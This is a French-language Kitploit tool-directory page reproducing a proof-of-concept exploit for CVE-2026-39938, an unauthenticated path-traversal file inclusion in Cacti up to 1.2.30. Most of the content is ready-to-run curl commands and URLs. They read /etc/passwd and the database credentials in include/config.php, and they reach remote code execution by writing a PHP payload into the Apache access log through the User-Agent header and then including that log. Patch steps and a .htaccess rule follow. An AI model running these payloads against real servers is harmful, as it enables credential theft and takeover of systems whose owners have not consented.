Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
By-Poloss..-..CVE-2026-39938 — Preuve de concept d'exploit pour CVE-2026-39938 : inclusion de fichier local non authentifiée dans Cacti <= 1.2.30, permettant la lecture arbitraire de fichiers et l'exécution de code à distance via empoisonnement des logs. | Kitploit
Outils/GitHubGitHub/polosss/by-poloss..-..cve-2026-39938
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubpolosss/by-poloss..-..cve-2026-39938

By-Poloss..-..CVE-2026-39938

Preuve de concept d'exploit pour CVE-2026-39938 : inclusion de fichier local non authentifiée dans Cacti <= 1.2.30, permettant la lecture arbitraire de fichiers et l'exécution de code à distance via empoisonnement des logs.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
1il y a 2 moisPas encore vérifié
Partager

CVE-2026-39938 : Cacti <= 1.2.30 - LFI non authentifié

Résumé exécutif

ChampValeur
ID CVECVE-2026-39938
Score CVSS9.8 (Critique)
Produit affectéCacti
Versions affectées<= 1.2.30
Version corrigée1.2.31
Commit de correction9871f0c

Détails de la vulnérabilité

Cause racine

La vulnérabilité existe dans lib/rrd.php où le paramètre graph_theme est utilisé directement sans assainissement :

CODE VULNÉRABLE :

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $rrdtheme = $config['base_path'] . '/include/themes/' . $graph_data_array['graph_theme'] . '/rrdtheme.php';
}

CODE CORRIGÉ :

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $theme = basename($graph_data_array['graph_theme']);
    if ($theme === '' || $theme === '.' || $theme === '..') {
        $theme = get_selected_theme();
    }
    $rrdtheme = $config['base_path'] . '/include/themes/' . $theme . '/rrdtheme.php';
}

Le problème : aucune validation contre les séquences de traversée de chemin ../, permettant aux attaquants de lire des fichiers arbitraires sans authentification.


Preuve de concept (PoC) - Étapes simples

Étape 1 : Vérifier la vulnérabilité - Lire /etc/passwd

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd"

Résultat : Le contenu de /etc/passwd sera affiché dans la réponse.

Étape 2 : Lire la configuration de la base de données

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php"

Résultat : Les identifiants de base de données (nom d'utilisateur, mot de passe) seront exposés.

Étape 3 : Exécution de code à distance via empoisonnement de logs

3.1 Injecter du code PHP dans le journal Apache

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?local_graph_id=1" \
  -H "User-Agent: <?php system('id'); ?>"

3.2 Exécuter le code en incluant le fichier de journal

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log"

Résultat : La sortie de la commande (ex. uid=33(www-data)) sera affichée.


Points de terminaison courants testés


Exemples d'URL de PoC

Test LFI de base

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd

Lire la config de l'application

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php

Empoisonnement de logs (Injection)

root@kitploit:~
http://target-cacti/graph_image.php?local_graph_id=1

Avec l'en-tête : User-Agent: <?php system('id'); ?>

Empoisonnement de logs (Exécution)

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log

Correction

Mettre à jour vers la version corrigée

root@kitploit:~
cd /var/www/html/cacti
git fetch --tags
git checkout tags/release/1.2.31

Vérifier l'application du correctif

root@kitploit:~
grep -A 5 "if (isset(\$graph_data_array\['graph_theme'\]))" lib/rrd.php | grep basename

Atténuation temporaire (.htaccess)

root@kitploit:~
RewriteCond %{QUERY_STRING} (^|&)graph_theme=\.\./ [NC]
RewriteRule ^graph_image\.php$ - [F,L]

Références

  • GitHub Security Advisory
  • Patch Commit 9871f0c
  • NVD CVE-2026-39938

W.P.E.F

  • Chaîne Telegram W.P.E.F #1
  • Chaîne Telegram W.P.E.F #2

Rapport généré à des fins de recherche en sécurité Date : 27 juin 2026

Télécharger l’outil
Point de terminaisonParamètreExemple de charge utile
/graph_image.phpgraph_theme../../../../../../../etc/passwd
/graph_image.phpgraph_theme../../../../include/config.php
/graph_image.phpgraph_theme../../../../../../../var/log/apache2/access.log